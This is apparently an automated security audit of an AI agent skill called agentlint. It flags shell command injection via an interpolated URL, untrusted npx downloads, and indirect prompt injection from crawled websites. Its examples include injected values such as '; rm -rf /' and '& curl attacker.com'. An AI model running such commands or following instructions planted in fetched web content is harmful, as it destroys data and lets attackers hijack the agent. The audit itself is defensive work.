agentlint
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to run
npx @cjavdev/agent-lint <url> --agent. The<url>parameter is a user-controlled variable interpolated directly into a shell command. Without strict sanitization, an attacker could inject additional commands (e.g.,; rm -rf /or& curl attacker.com). - [EXTERNAL_DOWNLOADS] (HIGH): The skill relies on
npxto download and execute code from the npm registry at runtime. The package@cjavdev/agent-lintis not from a trusted organization or repository defined in the security policy, representing an untrusted dependency. - [REMOTE_CODE_EXECUTION] (HIGH): The use of
npxto fetch and execute a remote package combined with shell-based invocation of user input constitutes a high-risk remote code execution vector. - [PROMPT_INJECTION] (MEDIUM): (Category 8: Indirect Prompt Injection) The skill ingests data from external websites through the audit process.
- Ingestion points: External URLs crawled by the CLI tool.
- Boundary markers: Absent; the agent is simply told to "Parse Results" and "Present Remediation Plan" from the output.
- Capability inventory: Shell execution (
npx), file access (implied via config flags). - Sanitization: None specified. An attacker-controlled website could include malicious text in its content (e.g., in a markdown file or meta tag) that the agent might interpret as instructions during the parsing and reporting phase.
Recommendations
- AI detected serious security threats
Audit Metadata